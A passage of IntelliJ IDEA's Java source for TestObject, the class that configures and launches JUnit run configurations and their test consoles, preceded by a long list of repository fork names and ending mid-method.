llij-community,dslomov/intellij-community,dslomov/intellij-community,ivan-fedorov/intellij-community,ibinti/intellij-community,blademainer/intellij-community,gnuhub/intellij-community,ftomassetti/intellij-community,TangHao1987/intellij-community,FHannes/intellij-community,ftomassetti/intellij-community,fnouama/intellij-community,nicolargo/intellij-community,apixandru/intellij-community,supersven/intellij-community,petteyg/intellij-community,vvv1559/intellij-community,retomerz/intellij-community,hurricup/intellij-community,MichaelNedzelsky/intellij-community,suncycheng/intellij-community,xfournet/intellij-community,apixandru/intellij-community,adedayo/intellij-community,lucafavatella/intellij-community,ryano144/intellij-community,clumsy/intellij-community,izonder/intellij-community,semonte/intellij-community,supersven/intellij-community,dslomov/intellij-community,ol-loginov/intellij-community,fnouama/intellij-community,ivan-fedorov/intellij-community,signed/intellij-community,jagguli/intellij-community,fnouama/intellij-community,pwoodworth/intellij-community,hurricup/intellij-community,pwoodworth/intellij-community,xfournet/intellij-community,xfournet/intellij-community,supersven/intellij-community,youdonghai/intellij-community,jagguli/intellij-community,orekyuu/intellij-community,hurricup/intellij-community,mglukhikh/intellij-community,asedunov/intellij-community,TangHao1987/intellij-community,diorcety/intellij-community,allotria/intellij-community,akosyakov/intellij-community,asedunov/intellij-community,signed/intellij-community,jagguli/intellij-community,idea4bsd/idea4bsd,michaelgallacher/intellij-community,ibinti/intellij-community,lucafavatella/intellij-community,lucafavatella/intellij-community,xfournet/intellij-community,ThiagoGarciaAlves/intellij-community,ol-loginov/intellij-community,signed/intellij-community,kool79/intellij-community,fnouama/intellij-community,amith01994/intellij-community,signed/intellij-community,semonte/intellij-community,gnuhub/intellij-community,FHannes/intellij-community,blademainer/intellij-community,hurricup/intellij-community,pwoodworth/intellij-community,youdonghai/intellij-community,ol-loginov/intellij-community,samthor/intellij-community,youdonghai/intellij-community,salguarnieri/intellij-community,vladmm/intellij-community,orekyuu/intellij-community,signed/intellij-community,kool79/intellij-community,ivan-fedorov/intellij-community,mglukhikh/intellij-community,holmes/intellij-community,ThiagoGarciaAlves/intellij-community,kdwink/intellij-community,robovm/robovm-studio,fnouama/intellij-community,kool79/intellij-community,supersven/intellij-community,amith01994/intellij-community,nicolargo/intellij-community,blademainer/intellij-community,retomerz/intellij-community,blademainer/intellij-community,holmes/intellij-community,youdonghai/intellij-community,jagguli/intellij-community,ibinti/intellij-community,apixandru/intellij-community,ibinti/intellij-community,allotria/intellij-community,allotria/intellij-community,TangHao1987/intellij-community,diorcety/intellij-community,asedunov/intellij-community,wreckJ/intellij-community,wreckJ/intellij-community,samthor/intellij-community,alphafoobar/intellij-community,idea4bsd/idea4bsd,holmes/intellij-community,amith01994/intellij-community,amith01994/intellij-community,MER-GROUP/intellij-community,hurricup/intellij-community,nicolargo/intellij-community,salguarnieri/intellij-community,holmes/intellij-community,muntasirsyed/intellij-community,lucafavatella/intellij-community,slisson/intellij-community,michaelgallach
er/intellij-community,semonte/intellij-community,ivan-fedorov/intellij-community,ryano144/intellij-community,Lekanich/intellij-community,lucafavatella/intellij-community,allotria/intellij-community,lucafavatella/intellij-community,alphafoobar/intellij-community,caot/intellij-community,kool79/intellij-community,kdwink/intellij-community,MER-GROUP/intellij-community,akosyakov/intellij-community,FHannes/intellij-community,ftomassetti/intellij-community,ThiagoGarciaAlves/intellij-community,semonte/intellij-community,samthor/intellij-community,kdwink/intellij-community,hurricup/intellij-community,orekyuu/intellij-community,fitermay/intellij-community,allotria/intellij-community,pwoodworth/intellij-community,tmpgit/intellij-community,suncycheng/intellij-community,SerCeMan/intellij-community,michaelgallacher/intellij-community,SerCeMan/intellij-community,xfournet/intellij-community,tmpgit/intellij-community,fitermay/intellij-community,wreckJ/intellij-community,fengbaicanhe/intellij-community,MichaelNedzelsky/intellij-community,samthor/intellij-community,fitermay/intellij-community,diorcety/intellij-community,kool79/intellij-community,robovm/robovm-studio,dslomov/intellij-community,MER-GROUP/intellij-community,Distrotech/intellij-community,mglukhikh/intellij-community,fnouama/intellij-community,ryano144/intellij-community,idea4bsd/idea4bsd,youdonghai/intellij-community,adedayo/intellij-community,mglukhikh/intellij-community,mglukhikh/intellij-community,slisson/intellij-community,adedayo/intellij-community,mglukhikh/intellij-community,vvv1559/intellij-community,da1z/intellij-community,youdonghai/intellij-community,Distrotech/intellij-community,ryano144/intellij-community,jagguli/intellij-community,semonte/intellij-community,michaelgallacher/intellij-community,ahb0327/intellij-community,robovm/robovm-studio,retomerz/intellij-community,suncycheng/intellij-community,xfournet/intellij-community,Lekanich/intellij-community,samthor/intellij-community,amith01994/intellij-community,caot/intellij-community,salguarnieri/intellij-community,izonder/intellij-community,suncycheng/intellij-community,ThiagoGarciaAlves/intellij-community,ThiagoGarciaAlves/intellij-community,pwoodworth/intellij-community,Lekanich/intellij-community,apixandru/intellij-community,tmpgit/intellij-community,Distrotech/intellij-community,slisson/intellij-community,ol-loginov/intellij-community,SerCeMan/intellij-community,wreckJ/intellij-community,alphafoobar/intellij-community,fnouama/intellij-community,idea4bsd/idea4bsd,ivan-fedorov/intellij-community,Lekanich/intellij-community,michaelgallacher/intellij-community,apixandru/intellij-community,ftomassetti/intellij-community,tmpgit/intellij-community,hurricup/intellij-community,allotria/intellij-community,MER-GROUP/intellij-community,jagguli/intellij-community,fnouama/intellij-community,da1z/intellij-community,dslomov/intellij-community,gnuhub/intellij-community,dslomov/intellij-community,holmes/intellij-community,hurricup/intellij-community,tmpgit/intellij-community,salguarnieri/intellij-community,asedunov/intellij-community,holmes/intellij-community,petteyg/intellij-community,petteyg/intellij-community,Distrotech/intellij-community,nicolargo/intellij-community,muntasirsyed/intellij-community,signed/intellij-community,da1z/intellij-community,TangHao1987/intellij-community,vladmm/intellij-community,orekyuu/intellij-community,samthor/intellij-community,ftomassetti/intellij-community,fitermay/intellij-community,orekyuu/intellij-community,izonder/intellij-community,signed/intellij-community,su
persven/intellij-community,asedunov/intellij-community,ol-loginov/intellij-community,kool79/intellij-community,supersven/intellij-community,salguarnieri/intellij-community,xfournet/intellij-community,alphafoobar/intellij-community,ryano144/intellij-community,diorcety/intellij-community,akosyakov/intellij-community,holmes/intellij-community,tmpgit/intellij-community,supersven/intellij-community,blademainer/intellij-community,jagguli/intellij-community,signed/intellij-community,idea4bsd/idea4bsd,youdonghai/intellij-community,xfournet/intellij-community,allotria/intellij-community,petteyg/intellij-community,diorcety/intellij-community,suncycheng/intellij-community,wreckJ/intellij-community,dslomov/intellij-community,Lekanich/intellij-community,tmpgit/intellij-community,lucafavatella/intellij-community,Lekanich/intellij-community,idea4bsd/idea4bsd,MichaelNedzelsky/intellij-community,Lekanich/intellij-community,adedayo/intellij-community,michaelgallacher/intellij-community,idea4bsd/idea4bsd,supersven/intellij-community,fengbaicanhe/intellij-community,fitermay/intellij-community,Distrotech/intellij-community,caot/intellij-community,slisson/intellij-community,semonte/intellij-community,caot/intellij-community,youdonghai/intellij-community,samthor/intellij-community,asedunov/intellij-community,pwoodworth/intellij-community,asedunov/intellij-community,ahb0327/intellij-community,ryano144/intellij-community,asedunov/intellij-community,vvv1559/intellij-community,retomerz/intellij-community,mglukhikh/intellij-community,lucafavatella/intellij-community,fitermay/intellij-community,apixandru/intellij-community,diorcety/intellij-community,muntasirsyed/intellij-community,robovm/robovm-studio,kool79/intellij-community,salguarnieri/intellij-community,holmes/intellij-community,ftomassetti/intellij-community,ryano144/intellij-community,apixandru/intellij-community,ThiagoGarciaAlves/intellij-community,vladmm/intellij-community,kool79/intellij-community,akosyakov/intellij-community,MichaelNedzelsky/intellij-community,pwoodworth/intellij-community,michaelgallacher/intellij-community,adedayo/intellij-community,asedunov/intellij-community,apixandru/intellij-community,ol-loginov/intellij-community,supersven/intellij-community,ivan-fedorov/intellij-community,allotria/intellij-community,jagguli/intellij-community,vvv1559/intellij-community,izonder/intellij-community,semonte/intellij-community,allotria/intellij-community,allotria/intellij-community,kdwink/intellij-community,salguarnieri/intellij-community,ryano144/intellij-community,semonte/intellij-community,ftomassetti/intellij-community,FHannes/intellij-community,ivan-fedorov/intellij-community,petteyg/intellij-community,vvv1559/intellij-community,adedayo/intellij-community,jagguli/intellij-community,ftomassetti/intellij-community,lucafavatella/intellij-community,SerCeMan/intellij-community,vvv1559/intellij-community,muntasirsyed/intellij-community,Lekanich/intellij-community,fitermay/intellij-community,fitermay/intellij-community,kdwink/intellij-community,muntasirsyed/intellij-community,mglukhikh/intellij-community,vvv1559/intellij-community,slisson/intellij-community,nicolargo/intellij-community,muntasirsyed/intellij-community,kool79/intellij-community,slisson/intellij-community,salguarnieri/intellij-community,amith01994/intellij-community,FHannes/intellij-community,izonder/intellij-community,wreckJ/intellij-community,blademainer/intellij-community,michaelgallacher/intellij-community,idea4bsd/idea4bsd,akosyakov/intellij-community,izonder/intellij-community,xfournet/
intellij-community,youdonghai/intellij-community,suncycheng/intellij-community,wreckJ/intellij-community,da1z/intellij-community,ol-loginov/intellij-community,MichaelNedzelsky/intellij-community,MichaelNedzelsky/intellij-community,MichaelNedzelsky/intellij-community,retomerz/intellij-community,caot/intellij-community,amith01994/intellij-community,lucafavatella/intellij-community,vladmm/intellij-community,pwoodworth/intellij-community,tmpgit/intellij-community,fitermay/intellij-community,adedayo/intellij-community,ahb0327/intellij-community,hurricup/intellij-community,gnuhub/intellij-community,signed/intellij-community,retomerz/intellij-community,vvv1559/intellij-community,michaelgallacher/intellij-community,hurricup/intellij-community,robovm/robovm-studio,diorcety/intellij-community,alphafoobar/intellij-community,TangHao1987/intellij-community,ftomassetti/intellij-community,apixandru/intellij-community,Distrotech/intellij-community,adedayo/intellij-community,dslomov/intellij-community,ibinti/intellij-community,nicolargo/intellij-community,dslomov/intellij-community,amith01994/intellij-community,vvv1559/intellij-community,suncycheng/intellij-community,ThiagoGarciaAlves/intellij-community,kool79/intellij-community,caot/intellij-community,da1z/intellij-community,fengbaicanhe/intellij-community,Distrotech/intellij-community,fnouama/intellij-community,ibinti/intellij-community,ahb0327/intellij-community,TangHao1987/intellij-community,nicolargo/intellij-community,suncycheng/intellij-community,vvv1559/intellij-community,akosyakov/intellij-community,izonder/intellij-community,diorcety/intellij-community,jagguli/intellij-community,vvv1559/intellij-community,youdonghai/intellij-community,caot/intellij-community,xfournet/intellij-community,ivan-fedorov/intellij-community,fitermay/intellij-community,clumsy/intellij-community,SerCeMan/intellij-community,idea4bsd/idea4bsd,da1z/intellij-community,hurricup/intellij-community,akosyakov/intellij-community,tmpgit/intellij-community,samthor/intellij-community,mglukhikh/intellij-community,robovm/robovm-studio,gnuhub/intellij-community,michaelgallacher/intellij-community,ahb0327/intellij-community,allotria/intellij-community,vladmm/intellij-community,ibinti/intellij-community,izonder/intellij-community,alphafoobar/intellij-community,adedayo/intellij-community,kdwink/intellij-community,alphafoobar/intellij-community,orekyuu/intellij-community,diorcety/intellij-community,semonte/intellij-community,Distrotech/intellij-community,ahb0327/intellij-community,izonder/intellij-community,adedayo/intellij-community,wreckJ/intellij-community,petteyg/intellij-community,mglukhikh/intellij-community,semonte/intellij-community,Distrotech/intellij-community,FHannes/intellij-community,fnouama/intellij-community,idea4bsd/idea4bsd,fengbaicanhe/intellij-community,ivan-fedorov/intellij-community,ol-loginov/intellij-community,ibinti/intellij-community,Lekanich/intellij-community,ahb0327/intellij-community,adedayo/intellij-community,semonte/intellij-community,fengbaicanhe/intellij-community,mglukhikh/intellij-community,orekyuu/intellij-community,ibinti/intellij-community,lucafavatella/intellij-community,dslomov/intellij-community,vvv1559/intellij-community,fengbaicanhe/intellij-community,da1z/intellij-community,vladmm/intellij-community,clumsy/intellij-community,robovm/robovm-studio,petteyg/intellij-community,lucafavatella/intellij-community,akosyakov/intellij-community,lucafavatella/intellij-community,amith01994/intellij-community,vladmm/intellij-community,alphafoobar/intellij-communi
ty,asedunov/intellij-community,clumsy/intellij-community,akosyakov/intellij-community,apixandru/intellij-community,TangHao1987/intellij-community,muntasirsyed/intellij-community,MichaelNedzelsky/intellij-community,salguarnieri/intellij-community,ahb0327/intellij-community,nicolargo/intellij-community,FHannes/intellij-community,wreckJ/intellij-community,Lekanich/intellij-community,amith01994/intellij-community,TangHao1987/intellij-community,blademainer/intellij-community,asedunov/intellij-community,xfournet/intellij-community,MER-GROUP/intellij-community,caot/intellij-community,robovm/robovm-studio,fengbaicanhe/intellij-community,fitermay/intellij-community,SerCeMan/intellij-community,amith01994/intellij-community,gnuhub/intellij-community,signed/intellij-community,Lekanich/intellij-community,hurricup/intellij-community,da1z/intellij-community,akosyakov/intellij-community,suncycheng/intellij-community,retomerz/intellij-community,ryano144/intellij-community,da1z/intellij-community,caot/intellij-community,SerCeMan/intellij-community,SerCeMan/intellij-community,slisson/intellij-community,fitermay/intellij-community,nicolargo/intellij-community,ol-loginov/intellij-community,diorcety/intellij-community,akosyakov/intellij-community,ivan-fedorov/intellij-community,ryano144/intellij-community,da1z/intellij-community,amith01994/intellij-community,caot/intellij-community,orekyuu/intellij-community,signed/intellij-community,blademainer/intellij-community,petteyg/intellij-community,MER-GROUP/intellij-community,apixandru/intellij-community,wreckJ/intellij-community,ibinti/intellij-community,idea4bsd/idea4bsd,blademainer/intellij-community,fnouama/intellij-community,izonder/intellij-community,MER-GROUP/intellij-community,ryano144/intellij-community,alphafoobar/intellij-community,retomerz/intellij-community,orekyuu/intellij-community,pwoodworth/intellij-community,xfournet/intellij-community,apixandru/intellij-community,ivan-fedorov/intellij-community,wreckJ/intellij-community,youdonghai/intellij-community,youdonghai/intellij-community,Distrotech/intellij-community,retomerz/intellij-community,robovm/robovm-studio,kool79/intellij-community,ahb0327/intellij-community,MER-GROUP/intellij-community,ol-loginov/intellij-community,retomerz/intellij-community,tmpgit/intellij-community,petteyg/intellij-community,fengbaicanhe/intellij-community,samthor/intellij-community,robovm/robovm-studio,ThiagoGarciaAlves/intellij-community,asedunov/intellij-community,pwoodworth/intellij-community,MichaelNedzelsky/intellij-community,slisson/intellij-community,clumsy/intellij-community,samthor/intellij-community,michaelgallacher/intellij-community,FHannes/intellij-community,izonder/intellij-community,orekyuu/intellij-community,vladmm/intellij-community,semonte/intellij-community,holmes/intellij-community,slisson/intellij-community,jagguli/intellij-community,alphafoobar/intellij-community,mglukhikh/intellij-community,kdwink/intellij-community,FHannes/intellij-community,robovm/robovm-studio,fengbaicanhe/intellij-community,dslomov/intellij-community,ibinti/intellij-community,Lekanich/intellij-community,FHannes/intellij-community,signed/intellij-community,SerCeMan/intellij-community,suncycheng/intellij-community,supersven/intellij-community,clumsy/intellij-community,petteyg/intellij-community,allotria/intellij-community,muntasirsyed/intellij-community,TangHao1987/intellij-community,TangHao1987/intellij-community
/* * Copyright 2000-2011 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.execution.junit; import com.intellij.ExtensionPoints; import com.intellij.execution.*; import com.intellij.execution.configurations.*; import com.intellij.execution.junit2.TestProxy; import com.intellij.execution.junit2.segments.DeferredActionsQueue; import com.intellij.execution.junit2.segments.DeferredActionsQueueImpl; import com.intellij.execution.junit2.segments.DispatchListener; import com.intellij.execution.junit2.segments.Extractor; import com.intellij.execution.junit2.ui.JUnitTreeConsoleView; import com.intellij.execution.junit2.ui.TestsPacketsReceiver; import com.intellij.execution.junit2.ui.actions.RerunFailedTestsAction; import com.intellij.execution.junit2.ui.model.CompletionEvent; import com.intellij.execution.junit2.ui.model.JUnitRunningModel; import com.intellij.execution.junit2.ui.model.RootTestInfo; import com.intellij.execution.junit2.ui.properties.JUnitConsoleProperties; import com.intellij.execution.process.ProcessAdapter; import com.intellij.execution.process.ProcessEvent; import com.intellij.execution.runners.ExecutionEnvironment; import com.intellij.execution.runners.ProgramRunner; import com.intellij.execution.testframework.*; import com.intellij.execution.testframework.sm.SMTestRunnerConnectionUtil; import com.intellij.execution.testframework.sm.runner.SMTRunnerConsoleProperties; import com.intellij.execution.testframework.sm.runner.ui.SMTRunnerConsoleView; import com.intellij.execution.testframework.ui.BaseTestsOutputConsoleView; import com.intellij.execution.ui.ConsoleView; import com.intellij.execution.ui.ConsoleViewContentType; import com.intellij.execution.util.JavaParametersUtil; import com.intellij.execution.util.ProgramParametersUtil; import com.intellij.openapi.Disposable; import com.intellij.openapi.diagnostic.Logger; import com.intellij.openapi.extensions.Extensions; import com.intellij.openapi.module.Module; import com.intellij.openapi.module.ModuleUtilCore; import com.intellij.openapi.project.Project; import com.intellij.openapi.projectRoots.JavaSdkType; import com.intellij.openapi.projectRoots.Sdk; import com.intellij.openapi.projectRoots.ex.JavaSdkUtil; import com.intellij.openapi.roots.ModuleRootManager; import com.intellij.openapi.roots.ProjectRootManager; import com.intellij.openapi.util.Comparing; import com.intellij.openapi.util.Disposer; import com.intellij.openapi.util.Getter; import com.intellij.openapi.util.Key; import com.intellij.openapi.util.io.FileUtil; import com.intellij.openapi.util.registry.Registry; import com.intellij.openapi.vfs.CharsetToolkit; import com.intellij.psi.PsiClass; import com.intellij.psi.PsiElement; import com.intellij.psi.PsiMethod; import com.intellij.psi.PsiPackage; import com.intellij.refactoring.listeners.RefactoringElementListener; import com.intellij.rt.execution.junit.IDEAJUnitListener; import com.intellij.rt.execution.junit.JUnitStarter; import com.intellij.util.Function; import com.intellij.util.PathUtil; 
import jetbrains.buildServer.messages.serviceMessages.ServiceMessageTypes; import org.jetbrains.annotations.NonNls; import org.jetbrains.annotations.NotNull; import org.jetbrains.jps.model.serialization.PathMacroUtil; import java.io.File; import java.io.IOException; import java.io.PrintWriter; import java.util.*; public abstract class TestObject implements JavaCommandLine { protected static final Logger LOG = Logger.getInstance("#com.intellij.execution.junit.TestObject"); private static final String MESSAGE = ExecutionBundle.message("configuration.not.speficied.message"); @NonNls private static final String JUNIT_TEST_FRAMEWORK_NAME = "JUnit"; protected JavaParameters myJavaParameters; private final Project myProject; protected final JUnitConfiguration myConfiguration; protected final ExecutionEnvironment myEnvironment; protected File myTempFile = null; protected File myWorkingDirsFile = null; public File myListenersFile; public static TestObject fromString(final String id, final Project project, final JUnitConfiguration configuration, ExecutionEnvironment environment) { if (JUnitConfiguration.TEST_METHOD.equals(id)) return new TestMethod(project, configuration, environment); if (JUnitConfiguration.TEST_CLASS.equals(id)) return new TestClass(project, configuration, environment); if (JUnitConfiguration.TEST_PACKAGE.equals(id)) return new TestPackage(project, configuration, environment); else if (JUnitConfiguration.TEST_DIRECTORY.equals(id)) { return new TestDirectory(project, configuration, environment); } if (JUnitConfiguration.TEST_PATTERN.equals(id)) { return new TestsPattern(project, configuration, environment); } return NOT_CONFIGURED; } public Module[] getModulesToCompile() { final SourceScope sourceScope = getSourceScope(); return sourceScope != null ? sourceScope.getModulesToCompile() : Module.EMPTY_ARRAY; } protected TestObject(final Project project, final JUnitConfiguration configuration, ExecutionEnvironment environment) { myProject = project; myConfiguration = configuration; myEnvironment = environment; } public abstract String suggestActionName(); public RunnerSettings getRunnerSettings() { return myEnvironment.getRunnerSettings(); } public abstract RefactoringElementListener getListener(PsiElement element, JUnitConfiguration configuration); public abstract boolean isConfiguredByElement(JUnitConfiguration configuration, PsiClass testClass, PsiMethod testMethod, PsiPackage testPackage); protected void configureModule(final JavaParameters parameters, final RunConfigurationModule configurationModule, final String mainClassName) throws CantRunException { int classPathType = JavaParametersUtil.getClasspathType(configurationModule, mainClassName, true); JavaParametersUtil.configureModule(configurationModule, parameters, classPathType, myConfiguration.isAlternativeJrePathEnabled() ? 
myConfiguration.getAlternativeJrePath() : null); } private static final TestObject NOT_CONFIGURED = new TestObject(null, null, null) { @Override public RefactoringElementListener getListener(final PsiElement element, final JUnitConfiguration configuration) { return null; } @Override public String suggestActionName() { throw new RuntimeException(String.valueOf(myConfiguration)); } @Override public boolean isConfiguredByElement(final JUnitConfiguration configuration, PsiClass testClass, PsiMethod testMethod, PsiPackage testPackage) { return false; } @Override public void checkConfiguration() throws RuntimeConfigurationException { throw new RuntimeConfigurationError(MESSAGE); } @Override public JavaParameters getJavaParameters() throws ExecutionException { throw new ExecutionException(MESSAGE); } @Override protected void initialize() throws ExecutionException { throw new ExecutionException(MESSAGE); } }; public void checkConfiguration() throws RuntimeConfigurationException{ JavaParametersUtil.checkAlternativeJRE(myConfiguration); ProgramParametersUtil.checkWorkingDirectoryExist(myConfiguration, myConfiguration.getProject(), myConfiguration.getConfigurationModule().getModule()); } public SourceScope getSourceScope() { return SourceScope.modulesWithDependencies(myConfiguration.getModules()); } protected void initialize() throws ExecutionException { JavaParametersUtil.configureConfiguration(myJavaParameters, myConfiguration); myJavaParameters.setMainClass(JUnitConfiguration.JUNIT_START_CLASS); final Module module = myConfiguration.getConfigurationModule().getModule(); if (myJavaParameters.getJdk() == null){ myJavaParameters.setJdk(module != null ? ModuleRootManager.getInstance(module).getSdk() : ProjectRootManager.getInstance(myProject).getProjectSdk()); } myJavaParameters.getClassPath().add(JavaSdkUtil.getIdeaRtJarPath()); myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(JUnitStarter.class)); if (Registry.is("junit_sm_runner", false)) { myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(ServiceMessageTypes.class)); } myJavaParameters.getProgramParametersList().add(JUnitStarter.IDE_VERSION + JUnitStarter.VERSION); for (RunConfigurationExtension ext : Extensions.getExtensions(RunConfigurationExtension.EP_NAME)) { ext.updateJavaParameters(myConfiguration, myJavaParameters, getRunnerSettings()); } final Object[] listeners = Extensions.getExtensions(IDEAJUnitListener.EP_NAME); final StringBuilder buf = new StringBuilder(); for (final Object listener : listeners) { boolean enabled = true; for (RunConfigurationExtension ext : Extensions.getExtensions(RunConfigurationExtension.EP_NAME)) { if (ext.isListenerDisabled(myConfiguration, listener, getRunnerSettings())) { enabled = false; break; } } if (enabled) { final Class classListener = listener.getClass(); buf.append(classListener.getName()).append("\n"); myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(classListener)); } } if (buf.length() > 0) { try { myListenersFile = FileUtil.createTempFile("junit_listeners_", ""); myListenersFile.deleteOnExit(); myJavaParameters.getProgramParametersList().add("@@" + myListenersFile.getPath()); FileUtil.writeToFile(myListenersFile, buf.toString().getBytes(CharsetToolkit.UTF8_CHARSET)); } catch (IOException e) { LOG.error(e); } } } @Override public JavaParameters getJavaParameters() throws ExecutionException { if (myJavaParameters == null) { myJavaParameters = new JavaParameters(); initialize(); final Module module = myConfiguration.getConfigurationModule().getModule(); 
final Object[] patchers = Extensions.getExtensions(ExtensionPoints.JUNIT_PATCHER); for (Object patcher : patchers) { ((JUnitPatcher)patcher).patchJavaParameters(module, myJavaParameters); } } return myJavaParameters; } @Override public ExecutionResult execute(final Executor executor, @NotNull final ProgramRunner runner) throws ExecutionException { final boolean smRunner = Registry.is("junit_sm_runner", false); if (smRunner) { myJavaParameters.getVMParametersList().add("-Didea.junit.sm_runner"); } final JUnitProcessHandler handler = createHandler(executor); final RunnerSettings runnerSettings = getRunnerSettings(); JavaRunConfigurationExtensionManager.getInstance().attachExtensionsToProcess(myConfiguration, handler, runnerSettings); if (smRunner) { return useSmRunner(executor, handler); } final TestProxy unboundOutputRoot = new TestProxy(new RootTestInfo()); final JUnitConsoleProperties consoleProperties = new JUnitConsoleProperties(myConfiguration, executor); final JUnitTreeConsoleView consoleView = new JUnitTreeConsoleView(consoleProperties, myEnvironment, unboundOutputRoot); consoleView.initUI(); consoleView.attachToProcess(handler); unboundOutputRoot.setPrinter(consoleView.getPrinter()); Disposer.register(consoleView, unboundOutputRoot); final TestsPacketsReceiver packetsReceiver = new TestsPacketsReceiver(consoleView, unboundOutputRoot) { @Override public synchronized void notifyStart(TestProxy root) { if (!isRunning()) return; super.notifyStart(root); unboundOutputRoot.addChild(root); if (myConfiguration.isSaveOutputToFile()) { unboundOutputRoot.setOutputFilePath(myConfiguration.getOutputFilePath()); } final JUnitRunningModel model = getModel(); if (model != null) { handler.getOut().setDispatchListener(model.getNotifier()); Disposer.register(model, new Disposable() { @Override public void dispose() { handler.getOut().setDispatchListener(DispatchListener.DEAF); } }); consoleView.attachToModel(model); } } }; Disposer.register(consoleView, packetsReceiver); final DeferredActionsQueue queue = new DeferredActionsQueueImpl(); handler.getOut().setPacketDispatcher(packetsReceiver, queue); handler.getErr().setPacketDispatcher(packetsReceiver, queue); handler.addProcessListener(new ProcessAdapter() { private boolean myStarted = false; @Override public void startNotified(ProcessEvent event) { myStarted = true; } @Override public void processTerminated(ProcessEvent event) { handler.removeProcessListener(this); if (myTempFile != null) { FileUtil.delete(myTempFile); } if (myListenersFile != null) { FileUtil.delete(myListenersFile); } final Runnable runnable = new Runnable() { @Override public void run() { unboundOutputRoot.flush(); packetsReceiver.checkTerminated(); final JUnitRunningModel model = packetsReceiver.getModel(); notifyByBalloon(model, myStarted, consoleProperties); } }; handler.getOut().addRequest(runnable, queue); } @Override public void onTextAvailable(final ProcessEvent event, final Key outputType) { final String text = event.getText(); final ConsoleViewContentType consoleViewType = ConsoleViewContentType.getConsoleViewType(outputType); final Printable printable = new Printable() { @Override public void printOn(final Printer printer) { printer.print(text, consoleViewType); } }; final Extractor extractor; if (consoleViewType == ConsoleViewContentType.ERROR_OUTPUT || consoleViewType == ConsoleViewContentType.SYSTEM_OUTPUT) { extractor = handler.getErr(); } else { extractor = handler.getOut(); } extractor.getEventsDispatcher().processOutput(printable); } }); final 
RerunFailedTestsAction rerunFailedTestsAction = new RerunFailedTestsAction(consoleView); rerunFailedTestsAction.init(consoleProperties, myEnvironment); rerunFailedTestsAction.setModelProvider(new Getter<TestFrameworkRunningModel>() { @Override public TestFrameworkRunningModel get() { return packetsReceiver.getModel(); } }); final DefaultExecutionResult result = new DefaultExecutionResult(consoleView, handler); result.setRestartActions(rerunFailedTestsAction); return result; } private ExecutionResult useSmRunner(Executor executor, JUnitProcessHandler handler) { TestConsoleProperties testConsoleProperties = new SMTRunnerConsoleProperties( new RuntimeConfigurationProducer.DelegatingRuntimeConfiguration<JUnitConfiguration>( (JUnitConfiguration)myEnvironment.getRunProfile()), JUNIT_TEST_FRAMEWORK_NAME, executor ); testConsoleProperties.setIfUndefined(TestConsoleProperties.HIDE_PASSED_TESTS, false); BaseTestsOutputConsoleView smtConsoleView = SMTestRunnerConnectionUtil.createConsoleWithCustomLocator( JUNIT_TEST_FRAMEWORK_NAME, testConsoleProperties, myEnvironment, null); Disposer.register(myProject, smtConsoleView); final ConsoleView consoleView = smtConsoleView; consoleView.attachToProcess(handler); final RerunFailedTestsAction rerunFailedTestsAction = new RerunFailedTestsAction(consoleView); rerunFailedTestsAction.init(testConsoleProperties, myEnvironment); rerunFailedTestsAction.setModelProvider(new Getter<TestFrameworkRunningModel>() { @Override public TestFrameworkRunningModel get() { return ((SMTRunnerConsoleView)consoleView).getResultsViewer(); } }); final DefaultExecutionResult result = new DefaultExecutionResult(consoleView, handler); result.setRestartActions(rerunFailedTestsAction); return result; } protected void notifyByBalloon(JUnitRunningModel model, boolean started, JUnitConsoleProperties consoleProperties) { String comment; if (model != null) { final CompletionEvent done = model.getProgress().getDone(); comment = done != null ? done.getComment() : null; } else { comment = null; } TestsUIUtil.notifyByBalloon(myProject, started, model != null ? 
model.getRoot() : null, consoleProperties, comment); } protected JUnitProcessHandler createHandler(Executor executor) throws ExecutionException { appendForkInfo(executor); return JUnitProcessHandler.runCommandLine(CommandLineBuilder.createFromJavaParameters(myJavaParameters, myProject, true)); } private boolean forkPerModule() { final String workingDirectory = myConfiguration.getWorkingDirectory(); return JUnitConfiguration.TEST_PACKAGE.equals(myConfiguration.getPersistentData().TEST_OBJECT) && myConfiguration.getPersistentData().getScope() != TestSearchScope.SINGLE_MODULE && ("$" + PathMacroUtil.MODULE_DIR_MACRO_NAME + "$").equals(workingDirectory); } private void appendForkInfo(Executor executor) throws ExecutionException { final String forkMode = myConfiguration.getForkMode(); if (Comparing.strEqual(forkMode, "none")) { final String workingDirectory = myConfiguration.getWorkingDirectory(); if (!JUnitConfiguration.TEST_PACKAGE.equals(myConfiguration.getPersistentData().TEST_OBJECT) || myConfiguration.getPersistentData().getScope() == TestSearchScope.SINGLE_MODULE || !("$" + PathMacroUtil.MODULE_DIR_MACRO_NAME + "$").equals(workingDirectory)) { return; } } if (getRunnerSettings() != null) { final String actionName = executor.getActionName(); throw new CantRunException(actionName + " is disabled in fork mode.<br/>Please change fork mode to &lt;none&gt; to " + actionName.toLowerCase() + "."); } final JavaParameters javaParameters = getJavaParameters(); final Sdk jdk = javaParameters.getJdk(); if (jdk == null) { throw new ExecutionException(ExecutionBundle.message("run.configuration.error.no.jdk.specified")); } try { final File tempFile = FileUtil.createTempFile("command.line", "", true); final PrintWriter writer = new PrintWriter(tempFile, CharsetToolkit.UTF8); try { writer.println(((JavaSdkType)jdk.getSdkType()).getVMExecutablePath(jdk)); for (String vmParameter : javaParameters.getVMParametersList().getList()) { writer.println(vmParameter); } writer.println("-classpath"); writer.println(javaParameters.getClassPath().getPathsString()); } finally { writer.close(); } myJavaParameters.getProgramParametersList().add("@@@" + forkMode + ',' + tempFile.getAbsolutePath()); } catch (Exception e) { LOG.error(e); } } protected <T> void addClassesListToJavaParameters(Collection<? extends T> elements, Function<T, String> nameFunction, String packageName, boolean createTempFile, boolean junit4) { try { if (createTempFile) { myTempFile = FileUtil.createTempFile("idea_junit", ".tmp"); myTempFile.deleteOnExit(); myJavaParameters.getProgramParametersList().add("@" + myTempFile.getAbsolutePath()); } final Map<String, List<String>> perModule = forkPerModule() ? 
